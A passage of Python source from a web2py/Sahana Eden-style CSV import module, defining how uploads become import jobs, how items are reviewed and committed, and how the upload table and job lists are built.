        # a tuple/list -> explicit path components
        args = ["s3csv"]
        template = attr.get(TEMPLATE, True)
        if template is True:
            args.extend([self.controller, "%s.csv" % self.function])
        elif isinstance(template, basestring):
            args.extend([self.controller, "%s.csv" % template])
        elif isinstance(template, (tuple, list)):
            args.extend(template[:-1])
            args.append("%s.csv" % template[-1])
        else:
            template = None
        if template is not None:
            url = URL(r=request, c="static", f="formats", args=args)
            try:
                # only add the download link if the template can be opened
                # NOTE(review): this open() leaks the file handle and builds
                # the path by string concatenation -- consider os.path.exists.
                open("%s/../%s" % (r.folder, url))
                form[0][0].insert(0, TR(TD(A(self.messages.download_template,
                                             _href=url)),
                                        _id="template__row"))
            except:
                pass

        if form.accepts(r.post_vars, session,
                        formname="upload_form"):
            upload_id = table.insert(**table._filter_fields(form.vars))
            # Collect the extra-column values to be appended to each CSV row
            if self.csv_extra_fields:
                self.csv_extra_data = Storage()
                for f in self.csv_extra_fields:
                    label = f.get("label", None)
                    if not label:
                        continue
                    field = f.get("field", None)
                    value = f.get("value", None)
                    if field:
                        if field.name in form.vars:
                            data = form.vars[field.name]
                        else:
                            data = field.default
                        value = data
                        requires = field.requires
                        if not isinstance(requires, (list, tuple)):
                            requires = [requires]
                        if requires:
                            # If the validator has options, translate the raw
                            # input into its option representation
                            requires = requires[0]
                            if isinstance(requires, IS_EMPTY_OR):
                                requires = requires.other
                            try:
                                options = requires.options()
                            except:
                                pass
                            else:
                                for k, v in options:
                                    if k == str(data):
                                        value = v
                    elif value is None:
                        continue
                    self.csv_extra_data[label] = value
        s3.no_formats = True
        return form

    # -------------------------------------------------------------------------
    def _create_upload_dataTable(self):
        """
            Build the list of previous import jobs for the current
            controller/function, with open/view/delete row actions and
            row highlighting for pending/failed jobs.
        """

        db = current.db
        request = self.request
        controller = self.controller
        function = self.function
        s3 = current.response.s3

        table = self.upload_table

        # Limit the list to the jobs of this controller/function
        s3.filter = (table.controller == controller) & \
                    (table.function == function)

        fields = ["id",
                  "filename",
                  "created_on",
                  "user_id",
                  "replace_option",
                  "status"]

        self._use_upload_table()

        # Hide the list of prior uploads for now
        #output = self._dataTable(fields, sort_by = [[2,"desc"]])
        output = dict()

        self._use_controller_table()

        if request.representation == "aadata":
            return output

        # Jobs with status Pending or In-Error can be (re-)opened
        rows = db(table.status != 3).select(table.id)
        restrictOpen = [str(row.id) for row in rows]
        # Completed jobs can only be viewed
        rows = db(table.status == 3).select(table.id)
        restrictView = [str(row.id) for row in rows]

        messages = self.messages
        s3.actions = [dict(label=str(messages.open_btn),
                           _class="action-btn",
                           url=URL(r=request,
                                   c=controller,
                                   f=function,
                                   args=["import"],
                                   vars={"job": "[id]"}),
                           restrict=restrictOpen),
                      dict(label=str(messages.view_btn),
                           _class="action-btn",
                           url=URL(r=request,
                                   c=controller,
                                   f=function,
                                   args=["import"],
                                   vars={"job": "[id]"}),
                           restrict=restrictView),
                      dict(label=str(messages.delete_btn),
                           _class="delete-btn",
                           url=URL(r=request,
                                   c=controller,
                                   f=function,
                                   args=["import"],
                                   vars={"job": "[id]",
                                         "delete": "True"})),
                      ]

        # Highlight pending jobs (status 1, alert style) and
        # jobs in error (status 2, warning style)
        rows = db(table.status == 1).select(table.id)
        s3.dataTableStyleAlert = [str(row.id) for row in rows]
        rows = db(table.status == 2).select(table.id)
        s3.dataTableStyleWarning = [str(row.id) for row in rows]

        return output

    # -------------------------------------------------------------------------
    def _create_import_item_dataTable(self, upload_id, job_id):
        """
            Build the dataTable of the individual items of an import job,
            wrapped into a FORM which lets the user select the items to
            commit.

            @param upload_id: the ID of the s3_import_upload record
            @param job_id: the ID of the import job the items belong to
        """

        s3 = current.response.s3

        # Render the "element" column via the custom item representation
        represent = {"element" : self._item_element_represent}
        self._use_import_item_table(job_id)

        # Add a filter to the dataTable query
        s3.filter = (self.table.job_id == job_id) & \
                    (self.table.tablename == self.controller_tablename)

        # Get a list of the records that have an error of None
        query =  (self.table.job_id == job_id) & \
                 (self.table.tablename == self.controller_tablename)
        rows = current.db(query).select(self.table.id, self.table.error)
        select_list = []
        error_list = []
        for row in rows:
            if row.error:
                error_list.append(str(row.id))
            else:
                select_list.append("%s" % row.id)
        select_id = ",".join(select_list)

        output = self._dataTable(["id", "element", "error"],
                                 sort_by = [[1, "asc"]],
                                 represent=represent)

        # Switch back to the controller table before rendering
        self._use_controller_table()

        if self.request.representation == "aadata":
            return output

        # Highlight rows in error in red
        s3.dataTableStyleWarning = error_list

        s3.dataTableSelectable = True
        s3.dataTablePostMethod = True
        table = output["items"]
        # Hidden inputs carry the upload ID, the commit mode and the
        # pre-selected (error-free) item IDs into the commit request
        job = INPUT(_type="hidden", _id="importUploadID", _name="job",
                    _value="%s" % upload_id)
        mode = INPUT(_type="hidden", _id="importMode", _name="mode",
                     _value="Inclusive")
        # only select the rows with no errors
        selected = INPUT(_type="hidden", _id="importSelected",
                         _name="selected", _value="[%s]" % select_id)
        form = FORM(table, job, mode, selected)
        output["items"] = form
        s3.dataTableSelectSubmitURL = "import?job=%s&" % upload_id
        s3.actions = [
                        dict(label= str(self.messages.item_show_details),
                             _class="action-btn",
                             _jqclick="$('.importItem.'+id).toggle();",
                             ),
                      ]
        return output

    # -------------------------------------------------------------------------
    def _generate_import_job(self,
                             upload_id,
                             openFile,
                             fileFormat,
                             stylesheet=None,
                             commit_job=False):
        """
            This will take a s3_import_upload record and
            generate the importJob

            @param upload_id: the ID of the s3_import_upload record
            @param openFile: the open file(-like) object with the
                             uploaded source data
            @param fileFormat: the source file format; currently only
                               "csv"/"comma-separated-values" is supported
            @param stylesheet: path to the transformation stylesheet
                               (looked up via _get_stylesheet if None)
            @param commit_job: commit the job immediately rather than
                               storing it for later review

            @return: True if the job was created, otherwise None
                     (with self.error/self.warning set accordingly)
        """

        _debug("S3Importer._generate_import_job(%s, %s, %s, %s)" % (upload_id,
                                                                openFile,
                                                                fileFormat,
                                                                stylesheet
                                                               )
              )

        db = current.db
        request = self.request
        resource = request.resource

        # ---------------------------------------------------------------------
        # CSV
        if fileFormat == "csv" or fileFormat == "comma-separated-values":

            fmt = "csv"
            src = openFile

        # ---------------------------------------------------------------------
        # XML
        # @todo: implement
        #elif fileFormat == "xml":

        # ---------------------------------------------------------------------
        # S3JSON
        # @todo: implement
        #elif fileFormat == "s3json":

        # ---------------------------------------------------------------------
        # PDF
        # @todo: implement
        #elif fileFormat == "pdf":

        # ---------------------------------------------------------------------
        # Unsupported Format
        else:
            msg = self.messages.unsupported_file_type % fileFormat
            self.error = msg
            _debug(msg)
            return None

        # Get the stylesheet
        if stylesheet == None:
            stylesheet = self._get_stylesheet()
        if stylesheet == None:
            return None

        # before calling import tree ensure the db.table is the controller_table
        self.table = self.controller_table
        self.tablename = self.controller_tablename

        # Pass stylesheet arguments
        args = Storage()
        mode = request.get_vars.get("xsltmode", None)
        if mode is not None:
            args.update(mode=mode)

        # Generate the import job
        resource.import_xml(src,
                            format=fmt,
                            extra_data=self.csv_extra_data,
                            stylesheet=stylesheet,
                            ignore_errors = True,
                            commit_job = commit_job,
                            **args)

        job = resource.job
        if job is None:
            if resource.error:
                # Error
                self.error = resource.error
                return None
            else:
                # Nothing to import
                self.warning = self.messages.no_records_to_import
                return None
        else:
            # Job created
            job_id = job.job_id
            errors = current.xml.collect_errors(job)
            if errors:
                current.response.s3.error_report = errors
            # Link the upload record to the job
            query = (self.upload_table.id == upload_id)
            result = db(query).update(job_id=job_id)
            # @todo: add check that result == 1, if not we are in error
            # Now commit the changes
            db.commit()

        # Remember the job ID for the subsequent commit/status update
        self.job_id = job_id
        return True

    # -------------------------------------------------------------------------
    def _get_stylesheet(self, file_format="csv"):
        """
            Get the stylesheet for transformation of the import

            @param file_format: the import source file format

            @return: path to the stylesheet, or None if it does not
                     exist (self.error is set in that case)
        """

        if file_format != "csv":
            # Non-CSV formats use a single import.xsl per format
            stylesheet = os.path.join(self.xslt_path,
                                      file_format,
                                      "import.xsl")
        else:
            xslt_path = os.path.join(self.xslt_path, "s3csv")
            # Use the "csv_stylesheet" parameter to override the CSV
            # stylesheet subpath and filename, e.g.
            #       s3_rest_controller(module, resourcename,
            #                          csv_stylesheet=("inv", "inv_item.xsl"))
            if self.csv_stylesheet:
                if isinstance(self.csv_stylesheet, (tuple, list)):
                    stylesheet = os.path.join(xslt_path,
                                              *self.csv_stylesheet)
                else:
                    stylesheet = os.path.join(xslt_path,
                                              self.controller,
                                              self.csv_stylesheet)
            else:
                # Default: <xslt_path>/s3csv/<controller>/<function>.<ext>
                xslt_filename = "%s.%s" % (self.function,
                                           self.xslt_extension)
                stylesheet = os.path.join(xslt_path,
                                          self.controller,
                                          xslt_filename)

        # Verify that the stylesheet exists (previously only checked
        # for the CSV case, so missing non-CSV stylesheets failed late)
        if not os.path.exists(stylesheet):
            msg = self.messages.stylesheet_not_found % stylesheet
            self.error = msg
            _debug(msg)
            return None

        return stylesheet

    # -------------------------------------------------------------------------
    def _commit_import_job(self, upload_id, items):
        """
            Save all of the selected import items

            @param upload_id: the ID of the s3_import_upload record
            @param items: list of the item record IDs (as strings)
                          which have been selected for commit

            @return: True if the commit succeeded without errors,
                     False if it failed or the upload record was not
                     found, None if no item table is available
        """

        _debug("S3Importer._commit_import_job(%s, %s)" % (upload_id, items))

        db = current.db
        resource = self.request.resource

        # Storage for the before/after snapshots of the job items
        self.importDetails = dict()

        # Look up the job ID and replace option of the upload record
        table = self.upload_table
        query = (table.id == upload_id)
        row = db(query).select(table.job_id,
                               table.replace_option,
                               limitby=(0, 1)).first()
        if row is None:
            return False
        job_id = row.job_id
        current.response.s3.import_replace = row.replace_option

        itemTable = S3ImportJob.define_item_table()

        if itemTable is not None:
            #****************************************************************
            # EXPERIMENTAL
            # This doesn't delete related items
            # but import_tree will tidy it up later
            #****************************************************************
            # get all the items selected for import
            rows = self._get_all_items(upload_id, as_string=True)

            # loop through each row and delete the items not required
            self._store_import_details(job_id, "preDelete")
            for item_id in rows:
                if str(item_id) not in items:
                    # @todo: replace with a helper method from the API
                    _debug("Deleting item.id = %s" % item_id)
                    db(itemTable.id == item_id).delete()

            #****************************************************************
            # EXPERIMENTAL
            #****************************************************************

            # set up the table we will import data into
            self.table = self.controller_table
            self.tablename = self.controller_tablename

            self._store_import_details(job_id, "preImportTree")

            # Now commit the remaining items
            resource.import_xml(None,
                                job_id = job_id,
                                ignore_errors = True)
            return resource.error is None

    # -------------------------------------------------------------------------
    def _store_import_details(self, job_id, key):
        """
            Snapshot the data/error pairs of all import items of a job
            into self.importDetails under the given key.

            @param job_id: the import job ID
            @param key: the dict key to store the snapshot under
                        (e.g. "preDelete", "preImportTree")
        """

        _debug("S3Importer._store_import_details(%s, %s)" % (job_id, key))

        item_table = S3ImportJob.define_item_table()

        query = (item_table.job_id == job_id)  & \
                (item_table.tablename == self.controller_tablename)
        details = []
        for row in current.db(query).select(item_table.data,
                                            item_table.error):
            details.append({"data": row.data, "error": row.error})

        self.importDetails[key] = details

    # -------------------------------------------------------------------------
    def _update_upload_job(self, upload_id):
        """
            Record the results of the import on the upload record and
            mark the job as completed.

            @param upload_id: the ID of the s3_import_upload record
            @return: tuple (total imported, total errors, total ignored)

            @todo: report errors in referenced records, too
        """

        _debug("S3Importer._update_upload_job(%s)" % (upload_id))

        resource = self.request.resource
        db = current.db

        details = self.importDetails
        num_before_delete = len(details["preDelete"])
        num_before_import = len(details["preImportTree"])
        totalIgnored = num_before_delete - num_before_import

        error_tree = resource.error_tree
        if error_tree is None:
            totalErrors = 0
        else:
            expr = "resource[@name='%s']" % resource.tablename
            totalErrors = len(error_tree.findall(expr))

        totalRecords = max(num_before_import - totalErrors, 0)

        # Store the summary and flag the job as completed (status 3)
        db(self.upload_table.id == upload_id).update(
                                        summary_added=totalRecords,
                                        summary_error=totalErrors,
                                        summary_ignored = totalIgnored,
                                        status = 3)

        # Now commit the changes
        db.commit()
        return (totalRecords, totalErrors, totalIgnored)

    # -------------------------------------------------------------------------
    def _display_completed_job(self, totals, timestmp=None):
        """
            Generate a summary flash message for a completed import job

            @param totals: the job totals as tuple
                           (total imported, total errors, total ignored)
            @param timestmp: the timestamp of the completion
        """

        session = current.session

        msg = "%s - %s - %s" % \
              (self.messages.commit_total_records_imported,
               self.messages.commit_total_errors,
               self.messages.commit_total_records_ignored)
        msg = msg % totals

        if timestmp is not None:
            session.flash = self.messages.job_completed % \
                            (self.date_represent(timestmp), msg)
        # NB: use value comparison, not "is" - identity comparison with
        # int literals only worked by CPython's small-int caching
        elif totals[1] != 0:
            session.error = msg
        elif totals[2] != 0:
            session.warning = msg
        else:
            session.flash = msg

    # -------------------------------------------------------------------------
    def _dataTable(self,
                   list_fields = None,
                   sort_by = None,
                   represent = None,
                  ):
        """
            Method to get the data for the dataTable
            This can be either a raw html representation or
            an ajax call update
            Additional data will be cached to limit calls back to the server

            @param list_fields: list of field names (None or [] =>
                                all readable fields of the resource)
            @param sort_by: list of sort by columns, e.g. [[1, "asc"]]
            @param represent: a dict of field callback functions used
                              to change how the data will be displayed

            @return: a dict()
               In html representations this will be a table of the data
               plus the sortby instructions
               In ajax this will be a json response

               In addition the following values will be made available:
               totalRecords         Number of records in the filtered data set
               totalDisplayRecords  Number of records to display
               start                Start point in the ordered data set
               limit                Number of records in the ordered set
               NOTE: limit - totalDisplayRecords = total cached
        """

        # None-sentinels instead of mutable default arguments
        if list_fields is None:
            list_fields = []
        if sort_by is None:
            sort_by = [[1, "asc"]]
        if represent is None:
            represent = {}

        # ********************************************************************
        # Common tasks
        # ********************************************************************
        db = current.db
        request = self.request
        response = current.response
        resource = self.resource
        s3 = response.s3
        representation = request.representation
        table = self.table
        tablename = self.tablename
        vars = request.get_vars
        output = dict()

        # Check permission to read this table
        authorised = self.permit("read", tablename)
        if not authorised:
            request.unauthorised()

        # List of fields to select from
        # fields is a list of Field objects
        # list_field is a string list of field names
        if not list_fields:
            fields = resource.readable_fields()
        else:
            fields = [table[f] for f in list_fields if f in table.fields]

        # attach any represent callbacks
        for f in fields:
            if f.name in represent:
                f.represent = represent[f.name]

        # Make sure that we have the table id as the first column
        # (guard against an empty fields list to avoid an IndexError)
        if not fields or fields[0].name != table.fields[0]:
            fields.insert(0, table[table.fields[0]])

        list_fields = [f.name for f in fields]

        # Filter
        if s3.filter is not None:
            self.resource.add_filter(s3.filter)

        # Ensure orderby is defined even if no sort variables are sent
        orderby = None

        # ********************************************************************
        # ajax call
        # ********************************************************************
        if representation == "aadata":
            start = vars.get("iDisplayStart", None)
            limit = vars.get("iDisplayLength", None)
            if limit is not None:
                try:
                    start = int(start)
                    limit = int(limit)
                except ValueError:
                    start = None
                    limit = None # use default
            else:
                start = None # use default
            # Using the sort variables sent from dataTables
            if vars.iSortingCols:
                orderby = self.ssp_orderby(resource, list_fields)

            # Echo
            sEcho = int(vars.sEcho or 0)

            # Get the list
            items = resource.sqltable(fields=list_fields,
                                      start=start,
                                      limit=limit,
                                      orderby=orderby,
                                      download_url=self.download_url,
                                      as_page=True) or []
            # Ugly hack to change any occurrence of [id] with the true id
            # Needed because the represent doesn't know the id
            for i in range(len(items)):
                row_id = items[i][0]
                for j in range(len(items[i])):
                    items[i][j] = items[i][j].replace("[id]", row_id)
            totalrows = self.resource.count()
            result = dict(sEcho = sEcho,
                          iTotalRecords = totalrows,
                          iTotalDisplayRecords = totalrows,
                          aaData = items)

            output = jsons(result)

        # ********************************************************************
        # html 'initial' call
        # ********************************************************************
        else: # catch all
            start = 0
            limit = 1
            # Sort by
            vars["iSortingCols"] = len(sort_by)

            # generate the dataTables.js variables for sorting:
            # one iSortCol_<n>/sSortDir_<n> pair per sort column
            for index, col in enumerate(sort_by):
                colName = "iSortCol_%s" % str(index)
                colValue = col[0]
                dirnName = "sSortDir_%s" % str(index)
                if len(col) > 1:
                    dirnValue = col[1]
                else:
                    dirnValue = "asc"
                vars[colName] = colValue
                vars[dirnName] = dirnValue
            # Now using these sort variables generate the order by statement
            orderby = self.ssp_orderby(resource, list_fields)

            # Remove the temporary sort variables again
            del vars["iSortingCols"]
            for index, col in enumerate(sort_by):
                del vars["iSortCol_%s" % str(index)]
                del vars["sSortDir_%s" % str(index)]

            # Get the first row for a quick up load
            items = resource.sqltable(fields=list_fields,
                                      start=start,
                                      limit=1,
                                      orderby=orderby,
                                      download_url=self.download_url)
            totalrows = resource.count()
            if items:
                if totalrows:
                    if s3.dataTable_iDisplayLength:
                        limit = 2 * s3.dataTable_iDisplayLength
                    else:
                        limit = 50
                # Add a test on the first call here:
                # Now get the limit rows for ajax style update of table
                sqltable = resource.sqltable(fields=list_fields,
                                             start=start,
                                             limit=limit,
                                             orderby=orderby,
                                             download_url=self.download_url,
                                             as_page=True)
                aadata = dict(aaData = sqltable or [])
                # Ugly hack to change any occurrence of [id] with the true id
                # Needed because the represent doesn't know the id
                for i in range(len(aadata["aaData"])):
                    row_id = aadata["aaData"][i][0]
                    for j in range(len(aadata["aaData"][i])):
                        aadata["aaData"][i][j] = \
                            aadata["aaData"][i][j].replace("[id]", row_id)

                aadata.update(iTotalRecords=totalrows,
                              iTotalDisplayRecords=totalrows)
                response.aadata = jsons(aadata)
                s3.start = 0
                s3.limit = limit
            else: # No items in database
                # s3import tables don't have a delete field but kept for the record
                if "deleted" in table:
                    available_records = db(table.deleted == False)
                else:
                    available_records = db(table.id > 0)
                # check for any records on an unfiltered table
                if available_records.select(table.id,
                                            limitby=(0, 1)).first():
                    items = self.crud_string(tablename, "msg_no_match")
                else:
                    items = self.crud_string(tablename, "msg_list_empty")

            output.update(items=items, sortby=sort_by)
            # Value to be added to the dataTable ajax call
            s3.dataTable_Method = "import"

        return output

    # -------------------------------------------------------------------------
    def _item_element_represent(self, value):
        """
            Represent the element in an import item for dataTable display

            @param value: the string containing the element

            NB: the "[id]" placeholder in the _class attributes is
                substituted with the real record ID by the replacement
                hack in _dataTable
        """

        T = current.T
        db = current.db

        value = S3XML.xml_decode(value)
        try:
            element = etree.fromstring(value)
        except:
            # XMLSyntaxError: return the element as-is
            return DIV(value)

        # The element carries the name of its target table
        tablename = element.get("name")
        table = current.db[tablename]

        output = DIV()
        details = TABLE(_class="importItem [id]")
        header, rows = self._add_item_details(element.findall("data"), table)
        if header is not None:
            output.append(header)
        # Add components, if present
        components = element.findall("resource")
        for component in components:
            ctablename = component.get("name")
            ctable = db[ctablename]
            self._add_item_details(component.findall("data"), ctable,
                                   details=rows, prefix=True)
        if rows:
            details.append(TBODY(rows))
        # Add error messages, if present
        errors = current.xml.collect_errors(element)
        if errors:
            details.append(TFOOT(TR(TH("%s:" % T("Errors")),
                                   TD(UL([LI(e) for e in errors])))))
        if rows == [] and components == []:
            # At this stage we don't have anything to display to see if we can
            # find something to show. This could be the case when a table being
            # imported is a resolver for a many to many relationship
            refdetail = TABLE(_class="importItem [id]")
            references = element.findall("reference")
            for reference in references:
                tuid = reference.get("tuid")
                resource = reference.get("resource")
                refdetail.append(TR(TD(resource), TD(tuid)))
            output.append(refdetail)
        else:
            output.append(details)
        return str(output)

    # -------------------------------------------------------------------------
    @staticmethod
    def _add_item_details(data, table, details=None, prefix=False):
        """
            Add details of the item element

            @param data: the list of data elements in the item element
            @param table: the table for the data
            @param details: the existing details rows list (to append to)
            @param prefix: prefix field names with the table name

            @return: tuple (header, details), where header is a
                     representative element for the item
        """

        tablename = table._tablename
        if details is None:
            details = []

        first_text = None
        first_string = None
        header = None

        for child in data:
            fname = child.get("field", None)
            # Skip fields not in the table, and bulky WKT fields
            if fname not in table.fields or fname == "wkt":
                continue
            field = table[fname]
            ftype = str(field.type)
            value = child.get("value", None)
            if not value:
                value = child.text
            try:
                value = S3Importer._decode_data(field, value)
            except:
                pass
            if value:
                value = S3XML.xml_encode(unicode(value))
            else:
                value = ""
            if fname != None and value != None:
                headerText = P(B("%s: " % fname), value)
                if not first_text:
                    first_text = headerText
                if ftype == "string" and not first_string:
                    first_string = headerText
                if fname == "name":
                    header = headerText
                if prefix:
                    label = "%s.%s:" % (tablename, fname)
                else:
                    label = "%s:" % fname
                details.append(TR(TH(label), TD(value)))

        # Prefer the "name" field as header, then the first string
        # field, then the first field of any type
        if not header:
            header = first_string or first_text
        return (header, details)

    # -------------------------------------------------------------------------
    @staticmethod
    def _decode_data(field, value):
        """
            Try to decode string data into their original type

            @param field: the Field instance
            @param value: the stringified value

            @todo: replace this by ordinary decoder
        """

        if field.type == "string" or \
            field.type == "string" or  \
            field.type == "password" or \
            field.type == "upload" or \
            field.type == "text":
            return value
        elif field.type == "integer" or field.type == "id":
            return int(value)
        elif field.type == "double" or field.type == "decimal":
            return double(value)
        elif  field.type == 'boolean':
            if value and not str(value)[:1].upper() in ["F", "0"]:
                return "T"
            else:
                return "F"
        elif field.type == "date":
            return value # @todo fix this to get a date
        elif field.type == "time":
            return value # @todo fix this to get a time
        elif field.type == "datetime":
            return value # @todo fix this to get a datetime
        else:
            return value

    # -------------------------------------------------------------------------
    @staticmethod
    def date_represent(date_obj):
        """
            Represent a datetime object as string

            @param date_obj: the datetime object

            @todo: replace by S3DateTime method?
        """
        return date_obj.strftime("%d %B %Y, %I:%M%p")

    # -------------------------------------------------------------------------
    def _process_item_list(self, upload_id, vars):
        """
            Get the list of IDs for the selected items from the "mode"
            and "selected" request variables

            @param upload_id: the upload_id
            @param vars: the request variables

            @returns: list of item IDs, or None if no mode was given
        """

        if "mode" not in vars:
            return None

        mode = vars["mode"]
        if "selected" in vars:
            selected = vars["selected"].split(",")
        else:
            selected = []

        if mode == "Inclusive":
            # Only the explicitly selected items
            return selected
        if mode == "Exclusive":
            # All items except the explicitly selected ones
            all_items = self._get_all_items(upload_id, as_string=True)
            return [item for item in all_items if item not in selected]
        return None

    # -------------------------------------------------------------------------
    def _get_all_items(self, upload_id, as_string=False):
        """ Get a list of the record IDs of all import items for
            the given upload ID

            @param upload_id: the upload ID
            @param as_string: represent each ID as string
        """

        upload_table = self.upload_table
        item_table = S3ImportJob.define_item_table()

        # All items of the job belonging to this upload, restricted
        # to the controller's target table
        query = (upload_table.id == upload_id) & \
                (item_table.job_id == upload_table.job_id) & \
                (item_table.tablename == self.controller_tablename)
        rows = current.db(query).select(item_table.id)

        if as_string:
            return [str(row.id) for row in rows]
        return [row.id for row in rows]

    # -------------------------------------------------------------------------
    def _use_upload_table(self):
        """
            Set the resource and the table to be s3_import_upload

            Lazily instantiates the upload resource on first use.
        """

        # "is None" rather than "== None" for identity check
        if self.upload_resource is None:
            # Deferred import to avoid circular dependency
            from s3resource import S3Resource
            prefix, name = self.UPLOAD_TABLE_NAME.split("_", 1)
            self.upload_resource = S3Resource(prefix, name)
        self.resource = self.upload_resource
        self.table = self.upload_table
        self.tablename = self.upload_tablename

    # -------------------------------------------------------------------------
    def _use_controller_table(self):
        """
            Point resource, table and tablename at the imported
            (controller) resource
        """

        self.tablename = self.controller_tablename
        self.table = self.controller_table
        self.resource = self.controller_resource

    # -------------------------------------------------------------------------
    def _use_import_item_table(self, job_id):
        """
            Set the resource and the table to be s3_import_item

            @param job_id: the job ID (currently unused, kept for
                           interface compatibility)
        """

        # "is None" rather than "== None" for identity check
        if self.item_resource is None:
            # Deferred import to avoid circular dependency
            from s3resource import S3Resource
            prefix, name = S3ImportJob.ITEM_TABLE_NAME.split("_", 1)
            self.item_resource = S3Resource(prefix, name)
        self.resource = self.item_resource
        self.tablename = S3ImportJob.ITEM_TABLE_NAME
        self.table = S3ImportJob.define_item_table()

    # -------------------------------------------------------------------------
    def __define_table(self):
        """ Configures the upload table

            Sets labels, representations, validators and defaults on
            the fields of the upload table, then stores the table in
            self.upload_table
        """

        _debug("S3Importer.__define_table()")

        T = current.T
        db = current.db
        request = current.request

        self.upload_tablename = self.UPLOAD_TABLE_NAME

        # Status codes stored in the "status" field
        import_upload_status = {
            1: T("Pending"),
            2: T("In error"),
            3: T("Completed"),
        }

        def user_name_represent(id):
            # Represent a user ID as "first_name last_name"
            # @todo: use s3_present_user?

            rep_str = "-"
            table = db.auth_user
            query = (table.id == id)
            row = db(query).select(table.first_name,
                                   table.last_name,
                                   limitby=(0, 1)).first()
            if row:
                rep_str = "%s %s" % (row.first_name, row.last_name)
            return rep_str

        def status_represent(index):
            # Map a status code to its label
            # NOTE(review): unknown non-None codes raise KeyError - confirm
            # whether that can occur in practice
            if index == None:
                return "Unknown" # @todo: use messages (internationalize)
            else:
                return import_upload_status[index]

        now = request.utcnow
        table = self.define_upload_table()
        table.file.upload_folder = os.path.join(request.folder,
                                                "uploads",
                                                #"imports"
                                                )
        table.file.comment = DIV(_class="tooltip",
                                 _title="%s|%s" %
                                    (self.messages.import_file,
                                     self.messages.import_file_comment))
        table.file.label = self.messages.import_file
        table.status.requires = IS_IN_SET(import_upload_status, zero=None)
        table.status.represent = status_represent
        table.user_id.label = self.messages.user_name
        table.user_id.represent = user_name_represent
        # Timestamps default to now, shown in human-readable form
        table.created_on.default = now
        table.created_on.represent = self.date_represent
        table.modified_on.default = now
        table.modified_on.update = now
        table.modified_on.represent = self.date_represent

        table.replace_option.label = T("Replace")

        self.upload_table = db[self.UPLOAD_TABLE_NAME]

    # -------------------------------------------------------------------------
    @classmethod
    def define_upload_table(cls):
        """ Defines the upload table (lazily, only if it does not yet
            exist in the DB)

            @returns: the upload table
        """

        db = current.db
        # Target folder for uploaded import source files
        # (previously this variable was computed but never used, while
        # the Field repeated the join inline - now defined once)
        uploadfolder = os.path.join(current.request.folder,
                                    "uploads",
                                    "imports",
                                    )
        if cls.UPLOAD_TABLE_NAME not in db:
            upload_table = db.define_table(cls.UPLOAD_TABLE_NAME,
                    Field("controller",
                          readable=False,
                          writable=False),
                    Field("function",
                          readable=False,
                          writable=False),
                    Field("file", "upload",
                          uploadfolder=uploadfolder,
                          autodelete=True),
                    Field("filename",
                          readable=False,
                          writable=False),
                    Field("status", "integer",
                          default=1,
                          readable=False,
                          writable=False),
                    Field("extra_data",
                          readable=False,
                          writable=False),
                    Field("replace_option", "boolean",
                          default=False,
                          readable=False,
                          writable=False),
                    Field("job_id",
                          length=128,
                          readable=False,
                          writable=False),
                    Field("user_id", "integer",
                          readable=False,
                          writable=False),
                    Field("created_on", "datetime",
                          readable=False,
                          writable=False),
                    Field("modified_on", "datetime",
                          readable=False,
                          writable=False),
                    Field("summary_added", "integer",
                          readable=False,
                          writable=False),
                    Field("summary_error", "integer",
                          readable=False,
                          writable=False),
                    Field("summary_ignored", "integer",
                          readable=False,
                          writable=False),
                    Field("completed_details", "text",
                          readable=False,
                          writable=False))
        else:
            upload_table = db[cls.UPLOAD_TABLE_NAME]

        return upload_table

# =============================================================================
class S3ImportItem(object):
    """ Class representing an import item (=a single record) """

    # Import methods an item can be committed with
    METHOD = Storage(
        CREATE="create",
        UPDATE="update",
        DELETE="delete"
    )

    # Update/conflict resolution policies
    POLICY = Storage(
        THIS="THIS",                # keep local instance
        OTHER="OTHER",              # update unconditionally
        NEWER="NEWER",              # update if import is newer
        MASTER="MASTER"             # update if import is master
    )

    # -------------------------------------------------------------------------
    def __init__(self, job):
        """
            Constructor

            @param job: the import job this item belongs to
        """

        self.job = job
        self.ERROR = current.manager.ERROR

        # Locking and error handling
        self.lock = False
        self.error = None

        # Identification
        import uuid
        self.item_id = uuid.uuid4() # unique ID for this item
        self.id = None              # database record ID (if known)
        self.uid = None             # record UID (if known)

        # Data elements
        self.table = None
        self.tablename = None
        self.element = None
        self.data = None
        self.original = None
        self.components = []
        self.references = []
        self.load_components = []
        self.load_references = []
        self.parent = None
        self.skip = False           # flag: skip this item during commit

        # Conflict handling
        self.mci = 2
        self.mtime = datetime.utcnow()
        self.modified = True
        self.conflict = False

        # Allowed import methods
        self.strategy = job.strategy
        # Update and conflict resolution policies
        self.update_policy = job.update_policy
        self.conflict_policy = job.conflict_policy

        # Actual import method
        self.method = None

        self.onvalidation = None
        self.onaccept = None

        # Item import status flags
        self.accepted = None
        self.permitted = False
        self.committed = False

        # Writeback hook for circular references:
        # Items which need a second write to update references
        self.update = []

    # -------------------------------------------------------------------------
    def __repr__(self):
        """ String representation of this item (for debugging) """

        return "<S3ImportItem %s {item_id=%s uid=%s id=%s error=%s data=%s}>" % (
                    self.table,
                    self.item_id,
                    self.uid,
                    self.id,
                    self.error,
                    self.data)

    # -------------------------------------------------------------------------
    def parse(self,
              element,
              original=None,
              table=None,
              tree=None,
              files=None):
        """
            Read data from a <resource> element

            @param element: the element
            @param original: the original record (if already known)
            @param table: the DB table
            @param tree: the import tree (currently unused)
            @param files: uploaded files

            @returns: True if successful, False if not (sets self.error)
        """

        db = current.db
        xml = current.xml
        manager = current.manager
        validate = manager.validate
        s3db = current.s3db

        self.element = element
        if table is None:
            # Look up the target table from the element's name attribute
            tablename = element.get(xml.ATTRIBUTE.name, None)
            try:
                table = s3db[tablename]
            except:
                # Table not defined (or name attribute missing)
                self.error = self.ERROR.BAD_RESOURCE
                element.set(xml.ATTRIBUTE.error, self.error)
                return False

        self.table = table
        self.tablename = table._tablename

        if original is None:
            original = manager.original(table, element)
        # Convert the element into a record dict (includes validation)
        data = xml.record(table, element,
                          files=files,
                          original=original,
                          validate=validate)

        if data is None:
            # Element could not be parsed => validation error
            self.error = self.ERROR.VALIDATION_ERROR
            self.accepted = False
            if not element.get(xml.ATTRIBUTE.error, False):
                element.set(xml.ATTRIBUTE.error, str(self.error))
            return False

        self.data = data

        if original is not None:
            # This item updates an existing record
            self.original = original
            self.id = original[table._id.name]
            if xml.UID in original:
                self.uid = original[xml.UID]
                self.data.update({xml.UID:self.uid})
        elif xml.UID in data:
            self.uid = data[xml.UID]
        # Take over modification time and master copy index (if present)
        if xml.MTIME in data:
            self.mtime = data[xml.MTIME]
        if xml.MCI in data:
            self.mci = data[xml.MCI]

